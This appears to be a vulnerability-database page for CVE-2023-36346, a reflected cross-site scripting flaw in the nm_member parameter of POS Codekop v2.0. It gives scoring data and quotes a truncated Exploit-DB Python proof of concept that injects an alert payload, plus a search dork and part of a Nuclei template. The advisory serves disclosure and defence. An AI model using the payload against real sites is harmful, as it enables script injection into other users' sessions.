CVE-2023-36346
published 2023-06-23CVE-2023-36346: POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
PriorityP340medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
5.29%
91.6th percentile
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codekop | codekop | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
exploitdb·2023-07-03·CVSS 6.1
CVE-2023-36346 [MEDIUM] Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
---
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "alert('XSS')"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=par
Nuclei
POS Codekop v2.0 - Cross Site Scripting
nuclei·CVSS 6.1
CVE-2023-36346 [MEDIUM] POS Codekop v2.0 - Cross Site Scripting
POS Codekop v2.0 - Cross Site Scripting
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
Template:
id: CVE-2023-36346
info:
name: POS Codekop v2.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://yuyudhn.github.io/pos-codekop-vulnerability/
-
http://packetstormsecurity.com/files/173280/Sales-Of-Cashier-Goods-1.0-Cross-Site-Scripting.htmlhttps://www.youtube.com/watch?v=bbbA-q1syrAhttps://yuyudhn.github.io/pos-codekop-vulnerability/http://packetstormsecurity.com/files/173280/Sales-Of-Cashier-Goods-1.0-Cross-Site-Scripting.htmlhttps://www.youtube.com/watch?v=bbbA-q1syrAhttps://yuyudhn.github.io/pos-codekop-vulnerability/
2023-06-23
Published